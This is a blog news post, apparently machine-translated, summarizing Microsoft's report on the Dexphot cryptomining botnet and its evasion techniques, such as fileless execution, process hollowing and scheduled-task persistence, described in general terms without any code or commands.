Menu
logosysdvd
  • Home
  • Tricks
  • Windows Freeware
    • Media Converters
    • Movie Players
  • VPN Networks
  • Blockchain
  • About me/SysDVD
logosysdvd

Dexphot malware infected more than 80,000 machines – Hacker

Posted on 11/28/2019 by sysdvd
Share this

Microsoft experts told about Malvari Dexphot, which has been attacking Windows machines since the fall of 2018. So, in June 2019, the activity of the malware reached its peak, when more than 80,000 systems became victims of the botnet. But now experts say that Dexphot's activity is declining, including thanks to the countermeasures they are taking.

The main goal of Dexphot has always been the extraction of cryptocurrency and the enrichment of its operators. But, despite some mediocre goals of the Malvari, researchers note that its authors used sophisticated techniques, and the harm itself was not so simple. The fact is that many of the techniques used by virus writers are more likely to be found studying the work of “government hackers,” but not just another miner.

Dexphot was a second-level payload, that is, it infected computers already infected with the ICLoader malware, which penetrated the system along with various software packages, or when users downloaded and installed hacked or pirated software.

Interestingly, the Dexphot installer was the only part of the malware that was written to disk for only a short period of time. For other files and operations, Dexphot used a file-free attack method, that is, it ran everything only in the computer's memory, making the presence of malvari in the system invisible to classical antivirus solutions that rely on signatures.

Dexphot also used the LOLbins (living off the land) technique to use legitimate Windows processes to execute malicious code, rather than launching its own executable files and processes. For example, according to Microsoft, the malware regularly abused msiexec.exe, unzip.exe, rundll32.exe, schtasks.exe and powershell.exe. Using these processes to run malicious code, Dexphot actually becomes indistinguishable from other local applications that also used these utilities to do their job.

In addition, Dexphot used a technique called polymorphism. So, Dexphot operators changed the file names and URLs used in the infection process every 20-30 minutes. By the time antivirus solutions detected a pattern in the Dexphot infection chain, it was changing and allowing Dexphot to stay one step ahead.

Since no malware will go unnoticed forever, Dexphot developers have taken care of the mechanism of a stable presence in the system. The malware used a technique called process hollowing to launch two legitimate processes (svchost.exe and nslookup.exe), clean their contents and run malicious code under their guise. These components, disguised as legitimate Windows processes, made sure that all parts of the malware were up and running, and reinstall the malware if necessary.

Additionally, Dexphot used a series of scheduled tasks (regularly changing their names), so that the victim was re-infected without file after each system reboot or every 90 or 110 minutes. This functionality also made it possible to regularly update the malware on all infected hosts. After all, every time one of the tasks was performed, the file was downloaded from the attackers server, and they could make changes to it.

  • Dexphot
  • hacker
  • infected
  • machines
  • malware
  • MalwareBytes Antimalware Download Now

    Recent Posts

    • Bless and save! Compare popular backup software
    • Snatch ransomware restarts computers in safe mode and bypasses antiviruses
    • Bayrob Malvari developers selling non-existent cars get long prison sentences
    • Due to an error in Ryuk ransomware code, victims lose their data – “Hacker”
    • Reveton ransomware operator ordered to pay £ 270,000 or prison term extended
    • NordVPN launches bug bounty – Hacker
    • A tool for "pirated" extension support for Windows 7 – "Hacker"
    • Fixed a vulnerability in ESXi that brought the researcher $ 200,000 – “Hacker"
    • DistKontrol USB-64. How we implemented a centralized storage system for USB keys – Hacker
    • The media said that BMW and Hyundai were hacked by Vietnamese hackers – "Hacker"
    • APT at Avast. CISO Avast Jaila Balu on the attack on the company and the challenges of good security
    • OpenBSD discovered privilege escalation and authentication bypass vulnerabilities
    • Fraudsters stole a million dollars by cheating on two companies in a regular correspondence
    • US authorities promise $ 5,000,000 for Russian hacker from Evil Corp, who developed Dridex
    • Google fixed more than 40 problems in Android, including the critical DoS vulnerability – “Hacker”
    • 44,000,000 Microsoft users reused the same passwords – Hacker
    • Vulnerability allows attackers to listen and intercept VPN connections
    • Leaky discs. Exploiting Vulnerabilities in Synology NAS – Hacker
    • The most copied piece of Java code on StackOverflow contains an error – “Hacker”
    • How to subordinate a config. Learning to exploit a new vulnerability in PHP-FPM and Nginx

    Categories

    • Android
    • Blockchain
    • Media Converters
    • Movie Players
    • News
    • Tricks
    • Uncategorized
    • VPN Networks
    • Windows Freeware

    The best on the WEB

    Facebook Download / Facebook Downloader – free service for downloading videos from facebook

    Top Antivirus List – List of the best antiviruses

    Dll Download Fix – Download DLL Files

    Torrent Search Engine – Search Torrents

    About ME

    John L.F – 27 years old 🙂 blogger, programmer, video designer

    My name is John, I was born in Germany but I currently live in the US. On a daily basis I am programming in C ++ and in several other languages, I am also interested in video processing and creating graphics in opensource applications such as GIMP, this is my first blog where you will find a lot of interesting information about programming and free/opensource software.

    • Terms and Conditions (“Terms”)
    • Privacy Policy
    • About me/SysDVD
    ©2019 SysDVD.com – Windows, Linux, MacOSX, Mobile